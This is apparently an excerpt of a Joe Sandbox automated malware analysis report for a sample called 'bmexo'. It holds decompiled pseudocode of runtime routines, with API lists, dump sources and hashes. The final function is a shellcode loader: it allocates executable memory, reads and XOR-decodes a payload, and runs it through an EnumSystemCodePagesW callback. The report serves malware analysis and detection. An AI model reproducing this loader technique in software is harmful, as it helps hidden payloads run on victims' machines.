                                          																while(1) {
                                          																	_t110 = _t66;
                                          																	__eflags = _t66 - 1;
                                          																	if(_t66 != 1) {
                                          																		break;
                                          																	}
                                          																	_t128 = _t128 | 0xffffffff;
                                          																	_t66 = _t110;
                                          																	asm("lock cmpxchg [ebx], edi");
                                          																	__eflags = _t66 - _t110;
                                          																	if(_t66 != _t110) {
                                          																		continue;
                                          																	} else {
                                          																		_t67 =  *[fs:0x18];
                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                          																		return _t67;
                                          																	}
                                          																	goto L59;
                                          																}
                                          																E009C5329(_t110, _t138);
                                          																_t69 = E009C53A5(_t138, 1);
                                          																return _t69;
                                          															}
                                          														}
                                          													}
                                          												}
                                          											} else {
                                          												_t56 =  *(_t96 + 0x28);
                                          												goto L3;
                                          											}
                                          										} else {
                                          											_t107 =  *_t119;
                                          											__eflags = _t107;
                                          											if(__eflags > 0) {
                                          												while(1) {
                                          													_t81 = _t107;
                                          													asm("lock cmpxchg [edi], esi");
                                          													__eflags = _t81 - _t107;
                                          													if(_t81 == _t107) {
                                          														break;
                                          													}
                                          													_t107 = _t81;
                                          													__eflags = _t81;
                                          													if(_t81 > 0) {
                                          														continue;
                                          													}
                                          													break;
                                          												}
                                          												_t56 = _a4;
                                          												__eflags = _t107;
                                          											}
                                          											if(__eflags != 0) {
                                          												while(1) {
                                          													L3:
                                          													__eflags = _t56;
                                          													if(_t56 != 0) {
                                          														goto L32;
                                          													}
                                          													_t107 = _t107 | 0xffffffff;
                                          													_t56 = 0;
                                          													asm("lock cmpxchg [edx], ecx");
                                          													__eflags = 0;
                                          													if(0 != 0) {
                                          														continue;
                                          													} else {
                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          														return 1;
                                          													}
                                          													goto L59;
                                          												}
                                          												continue;
                                          											} else {
                                          												goto L40;
                                          											}
                                          										}
                                          										goto L59;
                                          									}
                                          									__eflags = 0;
                                          									return 0;
                                          								} else {
                                          									_t115 =  *(_t96 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t106 =  *_t49;
                                          								__eflags = _t106;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t93 = _t106;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t93 - _t106;
                                          										if(_t93 == _t106) {
                                          											break;
                                          										}
                                          										_t106 = _t93;
                                          										__eflags = _t93;
                                          										if(_t93 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									__eflags = _t106;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L23;
                                          								}
                                          							}
                                          						}
                                          						goto L59;
                                          					}
                                          					_t84 = _t115;
                                          					asm("lock cmpxchg [esi], ecx");
                                          					__eflags = _t84 - _t115;
                                          					if(_t84 != _t115) {
                                          						_t115 = _t84;
                                          						goto L7;
                                          					} else {
                                          						return 1;
                                          					}
                                          				}
                                          				L59:
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A02206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: bc38fb5914e74c79d1dfdf0f984b291bd1b54c3975016ce8590b4485f4009013
                                          • Instruction ID: 88e760adb3d167d1eb9cb6a70a169e6b7d90ee16fd2d6810c8b08560d104e3e7
                                          • Opcode Fuzzy Hash: bc38fb5914e74c79d1dfdf0f984b291bd1b54c3975016ce8590b4485f4009013
                                          • Instruction Fuzzy Hash: 57515A31B003456FEB15CB19EC86FA673A9AFD8720F218229FD45DB2C5DA75EC818790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00F23815(void* __ebx, void* __edi, void* __eflags) {
                                          				void* __esi;
                                          				void* _t3;
                                          				intOrPtr _t6;
                                          				long _t14;
                                          				long* _t27;
                                          
                                          				E00F21890(_t3);
                                          				if(E00F24560() != 0) {
                                          					_t6 = E00F24001(E00F235A6);
                                          					 *0xf3350c = _t6;
                                          					__eflags = _t6 - 0xffffffff;
                                          					if(_t6 == 0xffffffff) {
                                          						goto L1;
                                          					} else {
                                          						_t27 = E00F24869(1, 0x3bc);
                                          						__eflags = _t27;
                                          						if(_t27 == 0) {
                                          							L6:
                                          							E00F2388B();
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							__eflags = E00F2405D( *0xf3350c, _t27);
                                          							if(__eflags == 0) {
                                          								goto L6;
                                          							} else {
                                          								_push(0);
                                          								_push(_t27);
                                          								E00F23762(__ebx, __edi, _t27, __eflags);
                                          								_t14 = GetCurrentThreadId();
                                          								_t27[1] = _t27[1] | 0xffffffff;
                                          								 *_t27 = _t14;
                                          								__eflags = 1;
                                          								return 1;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					L1:
                                          					E00F2388B();
                                          					return 0;
                                          				}
                                          			}

                                          0x00f23815
                                          0x00f23821
                                          0x00f23830
                                          0x00f23835
                                          0x00f2383b
                                          0x00f2383e
                                          0x00000000
                                          0x00f23840
                                          0x00f2384d
                                          0x00f23851
                                          0x00f23853
                                          0x00f23882
                                          0x00f23882
                                          0x00f23887
                                          0x00f2388a
                                          0x00f23855
                                          0x00f23863
                                          0x00f23865
                                          0x00000000
                                          0x00f23867
                                          0x00f23867
                                          0x00f23869
                                          0x00f2386a
                                          0x00f23871
                                          0x00f23877
                                          0x00f2387b
                                          0x00f2387f
                                          0x00f23881
                                          0x00f23881
                                          0x00f23865
                                          0x00f23853
                                          0x00f23823
                                          0x00f23823
                                          0x00f23823
                                          0x00f2382a
                                          0x00f2382a

                                          APIs
                                          • __init_pointers.LIBCMT ref: 00F23815
                                            • Part of subcall function 00F21890: EncodePointer.KERNEL32(00000000,?,00F2381A,00F2163A,00F32190,00000014), ref: 00F21893
                                            • Part of subcall function 00F21890: __initp_misc_winsig.LIBCMT ref: 00F218AE
                                            • Part of subcall function 00F21890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F24117
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F2412B
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F2413E
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F24151
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F24164
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F24177
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F2418A
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F2419D
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F241B0
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F241C3
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F241D6
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F241E9
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F241FC
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F2420F
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F24222
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F24235
                                          • __mtinitlocks.LIBCMT ref: 00F2381A
                                          • __mtterm.LIBCMT ref: 00F23823
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F2447A
                                            • Part of subcall function 00F2388B: _free.LIBCMT ref: 00F24481
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00F33558,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F244A3
                                          • __calloc_crt.LIBCMT ref: 00F23848
                                          • __initptd.LIBCMT ref: 00F2386A
                                          • GetCurrentThreadId.KERNEL32(00F2163A,00F32190,00000014), ref: 00F23871
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction ID: 53679f9e9f826de9714607a961869154b42b86f33cd884e755be5cba76d35680
                                          • Opcode Fuzzy Hash: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction Fuzzy Hash: 07F090B391923659E679B7787C036CA3A84CF01730B24862EF464DC0D2FF5DDA817A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E009E14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                          				signed int _v8;
                                          				char _v10;
                                          				char _v140;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t24;
                                          				void* _t26;
                                          				signed int _t29;
                                          				signed int _t34;
                                          				signed int _t40;
                                          				intOrPtr _t45;
                                          				void* _t51;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				signed int _t57;
                                          				void* _t58;
                                          
                                          				_t51 = __edx;
                                          				_t24 =  *0xa82088; // 0x7502537d
                                          				_v8 = _t24 ^ _t57;
                                          				_t45 = _a16;
                                          				_t53 = _a4;
                                          				_t52 = _a20;
                                          				if(_a4 == 0 || _t52 == 0) {
                                          					L10:
                                          					_t26 = 0xc000000d;
                                          				} else {
                                          					if(_t45 == 0) {
                                          						if( *_t52 == _t45) {
                                          							goto L3;
                                          						} else {
                                          							goto L10;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t28 =  &_v140;
                                          						if(_a12 != 0) {
                                          							_push("[");
                                          							_push(0x41);
                                          							_push( &_v140);
                                          							_t29 = E009D7707();
                                          							_t58 = _t58 + 0xc;
                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                          						}
                                          						_t54 = E009E13CB(_t53, _t28);
                                          						if(_a8 != 0) {
                                          							_t34 = E009D7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t34 * 2;
                                          						}
                                          						if(_a12 != 0) {
                                          							_t40 = E009D7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t40 * 2;
                                          						}
                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                          						 *_t52 = _t53;
                                          						if( *_t52 < _t53) {
                                          							goto L10;
                                          						} else {
                                          							E009A2340(_t45,  &_v140, _t53 + _t53);
                                          							_t26 = 0;
                                          						}
                                          					}
                                          				}
                                          				return E009AE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                          			}

                                          0x009e14c0
                                          0x009e14cb
                                          0x009e14d2
                                          0x009e14d6
                                          0x009e14da
                                          0x009e14de
                                          0x009e14e3
                                          0x009e157a
                                          0x009e157a
                                          0x009e14f1
                                          0x009e14f3
                                          0x00a0ea0f
                                          0x00000000
                                          0x00a0ea15
                                          0x00000000
                                          0x00a0ea15
                                          0x009e14f9
                                          0x009e14f9
                                          0x009e14fe
                                          0x009e1504
                                          0x00a0ea1a
                                          0x00a0ea1f
                                          0x00a0ea21
                                          0x00a0ea22
                                          0x00a0ea27
                                          0x00a0ea2a
                                          0x00a0ea2a
                                          0x009e1515
                                          0x009e1517
                                          0x009e156d
                                          0x009e1572
                                          0x009e1575
                                          0x009e1575
                                          0x009e151e
                                          0x00a0ea50
                                          0x00a0ea55
                                          0x00a0ea58
                                          0x00a0ea58
                                          0x009e152e
                                          0x009e1531
                                          0x009e1533
                                          0x00000000
                                          0x009e1535
                                          0x009e1541
                                          0x009e1549
                                          0x009e1549
                                          0x009e1533
                                          0x009e14f3
                                          0x009e1559

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 00A0EA22
                                            • Part of subcall function 009E13CB: ___swprintf_l.LIBCMT ref: 009E146B
                                            • Part of subcall function 009E13CB: ___swprintf_l.LIBCMT ref: 009E1490
                                          • ___swprintf_l.LIBCMT ref: 009E156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 764cc12ff7de594366b0e85334a4fa3061122fdd83c4e68ac94151a1e99a0d17
                                          • Instruction ID: 42abb00c8ef8def626569bf9fd9528c615c7f7ebb078b938641f2cd9f0138c0f
                                          • Opcode Fuzzy Hash: 764cc12ff7de594366b0e85334a4fa3061122fdd83c4e68ac94151a1e99a0d17
                                          • Instruction Fuzzy Hash: 6121C3729002199BCF21DF59CC41AEA73BCBB94700F444452FC46D3280EF749E588BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E00F212BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                          				char* _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				void* __ebx;
                                          				void* __esi;
                                          				signed int _t74;
                                          				signed int _t78;
                                          				char _t81;
                                          				signed int _t86;
                                          				signed int _t88;
                                          				signed int _t91;
                                          				signed int _t94;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				char* _t99;
                                          				signed int _t100;
                                          				signed int _t102;
                                          				signed int _t103;
                                          				signed int _t104;
                                          				char* _t110;
                                          				signed int _t113;
                                          				signed int _t117;
                                          				signed int _t119;
                                          				void* _t120;
                                          
                                          				_t99 = _a4;
                                          				_t74 = _a8;
                                          				_v8 = _t99;
                                          				_v12 = _t74;
                                          				if(_a12 == 0) {
                                          					L5:
                                          					return 0;
                                          				}
                                          				_t97 = _a16;
                                          				if(_t97 == 0) {
                                          					goto L5;
                                          				}
                                          				if(_t99 != 0) {
                                          					_t119 = _a20;
                                          					__eflags = _t119;
                                          					if(_t119 == 0) {
                                          						L9:
                                          						__eflags = _a8 - 0xffffffff;
                                          						if(_a8 != 0xffffffff) {
                                          							_t74 = E00F21530(_t99, 0, _a8);
                                          							_t120 = _t120 + 0xc;
                                          						}
                                          						__eflags = _t119;
                                          						if(_t119 == 0) {
                                          							goto L3;
                                          						} else {
                                          							_t78 = _t74 | 0xffffffff;
                                          							__eflags = _t97 - _t78 / _a12;
                                          							if(_t97 > _t78 / _a12) {
                                          								goto L3;
                                          							}
                                          							L13:
                                          							_t117 = _a12 * _t97;
                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                          							_t98 = _t117;
                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                          								_t100 = 0x1000;
                                          							} else {
                                          								_t100 =  *(_t119 + 0x18);
                                          							}
                                          							_v16 = _t100;
                                          							__eflags = _t117;
                                          							if(_t117 == 0) {
                                          								L41:
                                          								return _a16;
                                          							} else {
                                          								do {
                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                          										L24:
                                          										__eflags = _t98 - _t100;
                                          										if(_t98 < _t100) {
                                          											_t81 = E00F22752(_t98, _t119, _t119);
                                          											__eflags = _t81 - 0xffffffff;
                                          											if(_t81 == 0xffffffff) {
                                          												L46:
                                          												return (_t117 - _t98) / _a12;
                                          											}
                                          											_t102 = _v12;
                                          											__eflags = _t102;
                                          											if(_t102 == 0) {
                                          												L42:
                                          												__eflags = _a8 - 0xffffffff;
                                          												if(_a8 != 0xffffffff) {
                                          													E00F21530(_a4, 0, _a8);
                                          												}
                                          												 *((intOrPtr*)(E00F21CC3())) = 0x22;
                                          												L4:
                                          												E00F21E89();
                                          												goto L5;
                                          											}
                                          											_t110 = _v8;
                                          											 *_t110 = _t81;
                                          											_t98 = _t98 - 1;
                                          											_v8 = _t110 + 1;
                                          											_t103 = _t102 - 1;
                                          											__eflags = _t103;
                                          											_v12 = _t103;
                                          											_t100 =  *(_t119 + 0x18);
                                          											_v16 = _t100;
                                          											goto L40;
                                          										}
                                          										__eflags = _t100;
                                          										if(_t100 == 0) {
                                          											_t86 = 0x7fffffff;
                                          											__eflags = _t98 - 0x7fffffff;
                                          											if(_t98 <= 0x7fffffff) {
                                          												_t86 = _t98;
                                          											}
                                          										} else {
                                          											__eflags = _t98 - 0x7fffffff;
                                          											if(_t98 <= 0x7fffffff) {
                                          												_t44 = _t98 % _t100;
                                          												__eflags = _t44;
                                          												_t113 = _t44;
                                          												_t91 = _t98;
                                          											} else {
                                          												_t113 = 0x7fffffff % _t100;
                                          												_t91 = 0x7fffffff;
                                          											}
                                          											_t86 = _t91 - _t113;
                                          										}
                                          										__eflags = _t86 - _v12;
                                          										if(_t86 > _v12) {
                                          											goto L42;
                                          										} else {
                                          											_push(_t86);
                                          											_push(_v8);
                                          											_push(E00F22873(_t119));
                                          											_t88 = E00F22A2A();
                                          											_t120 = _t120 + 0xc;
                                          											__eflags = _t88;
                                          											if(_t88 == 0) {
                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                          												goto L46;
                                          											}
                                          											__eflags = _t88 - 0xffffffff;
                                          											if(_t88 == 0xffffffff) {
                                          												L45:
                                          												_t64 = _t119 + 0xc;
                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                          												__eflags =  *_t64;
                                          												goto L46;
                                          											}
                                          											_t98 = _t98 - _t88;
                                          											__eflags = _t98;
                                          											L36:
                                          											_v8 = _v8 + _t88;
                                          											_v12 = _v12 - _t88;
                                          											_t100 = _v16;
                                          											goto L40;
                                          										}
                                          									}
                                          									_t94 =  *(_t119 + 4);
                                          									_v20 = _t94;
                                          									__eflags = _t94;
                                          									if(__eflags == 0) {
                                          										goto L24;
                                          									}
                                          									if(__eflags < 0) {
                                          										goto L45;
                                          									}
                                          									__eflags = _t98 - _t94;
                                          									if(_t98 < _t94) {
                                          										_t94 = _t98;
                                          										_v20 = _t98;
                                          									}
                                          									_t104 = _v12;
                                          									__eflags = _t94 - _t104;
                                          									if(_t94 > _t104) {
                                          										goto L42;
                                          									} else {
                                          										E00F22897(_v8, _t104,  *_t119, _t94);
                                          										_t88 = _v20;
                                          										_t120 = _t120 + 0x10;
                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                          										_t98 = _t98 - _t88;
                                          										 *_t119 =  *_t119 + _t88;
                                          										goto L36;
                                          									}
                                          									L40:
                                          									__eflags = _t98;
                                          								} while (_t98 != 0);
                                          								goto L41;
                                          							}
                                          						}
                                          					}
                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                          					__eflags = _t97 - _t74;
                                          					if(_t97 <= _t74) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				L3:
                                          				 *((intOrPtr*)(E00F21CC3())) = 0x16;
                                          				goto L4;
			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                                          • Instruction ID: 1bcf9de745c09619da9bc4635b07aa96935cbff39a7f37e185754ced7966e0f4
                                          • Opcode Fuzzy Hash: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                                          • Instruction Fuzzy Hash: 6851C631E00325DBDB24DFA9F88066E77A6BF61330F248729F829866D0D7749D50AB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E00F27452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                          				void* _t7;
                                          				void* _t8;
                                          				intOrPtr* _t9;
                                          				intOrPtr* _t12;
                                          				void* _t20;
                                          				long _t31;
                                          
                                          				if(_a4 != 0) {
                                          					_t31 = _a8;
                                          					if(_t31 != 0) {
                                          						_push(__ebx);
                                          						while(_t31 <= 0xffffffe0) {
                                          							if(_t31 == 0) {
                                          								_t31 = _t31 + 1;
                                          							}
                                          							_t7 = HeapReAlloc( *0xf34834, 0, _a4, _t31);
                                          							_t20 = _t7;
                                          							if(_t20 != 0) {
                                          								L17:
                                          								_t8 = _t20;
                                          							} else {
                                          								if( *0xf34830 == _t7) {
                                          									_t9 = E00F21CC3();
                                          									 *_t9 = E00F21CD6(GetLastError());
                                          									goto L17;
                                          								} else {
                                          									if(E00F21741(_t7, _t31) == 0) {
                                          										_t12 = E00F21CC3();
                                          										 *_t12 = E00F21CD6(GetLastError());
                                          										L12:
                                          										_t8 = 0;
                                          									} else {
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          							goto L14;
                                          						}
                                          						E00F21741(_t6, _t31);
                                          						 *((intOrPtr*)(E00F21CC3())) = 0xc;
                                          						goto L12;
                                          					} else {
                                          						E00F24831(_a4);
                                          						_t8 = 0;
                                          					}
                                          					L14:
                                          					return _t8;
                                          				} else {
                                          					return E00F2114B(__ebx, __edx, __edi, _a8);
                                          				}
			}

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2745E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                          • _free.LIBCMT ref: 00F27471
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AllocHeap_free_malloc
                                          • String ID:
                                          • API String ID: 2734353464-0
                                          • Opcode ID: 219df23d8c9bc424a7cd698452e6d47b33cfe1fe1780128de9111ab3920a5a8c
                                          • Instruction ID: fb447e93684eef3c71140e95eba00b7b1477385d4cae60da360431e1652530e0
                                          • Opcode Fuzzy Hash: 219df23d8c9bc424a7cd698452e6d47b33cfe1fe1780128de9111ab3920a5a8c
                                          • Instruction Fuzzy Hash: EE110A32D4A735DBCB31BF70BC45B5A3FD8BF10370B204529F9489A250DA788841F694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00F21000(void* __ecx, void* __eflags, intOrPtr _a12) {
                                          				intOrPtr _v8;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr _t6;
                                          				void* _t7;
                                          				void* _t20;
                                          				_Unknown_base(*)()* _t21;
                                          				void* _t26;
                                          				void* _t27;
                                          				void* _t28;
                                          				intOrPtr* _t34;
                                          
                                          				_push(_t20);
                                          				_t28 = 0;
                                          				_t6 = E00F2114B(_t20, _t26, 0, 0x17d78400);
                                          				 *_t34 = 0xf33000;
                                          				_v8 = _t6;
                                          				_t7 = E00F211DD(_a12, _t27);
                                          				_t21 = VirtualAlloc(0, 0x12ca, 0x3000, 0x40);
                                          				E00F21481(_t21, 0x12ca, 1, _t7);
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					E00F21530(_t10, 0xcb, 0x17d78400);
                                          					do {
                                          						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x00000001 ^ 0x000000cc) - 0x00000076 ^ 0x000000d6) + 2;
                                          						_t28 = _t28 + 1;
                                          					} while (_t28 < 0x12ca);
                                          					EnumSystemCodePagesW(_t21, 0);
                                          				}
                                          				return 0;
			}

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2100E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                            • Part of subcall function 00F211DD: __wfsopen.LIBCMT ref: 00F211E8
                                          • VirtualAlloc.KERNEL32(00000000,000012CA,00003000,00000040), ref: 00F21036
                                          • __fread_nolock.LIBCMT ref: 00F21048
                                          • _memset.LIBCMT ref: 00F21062
                                          • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00F21082
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                          • String ID:
                                          • API String ID: 612201108-0
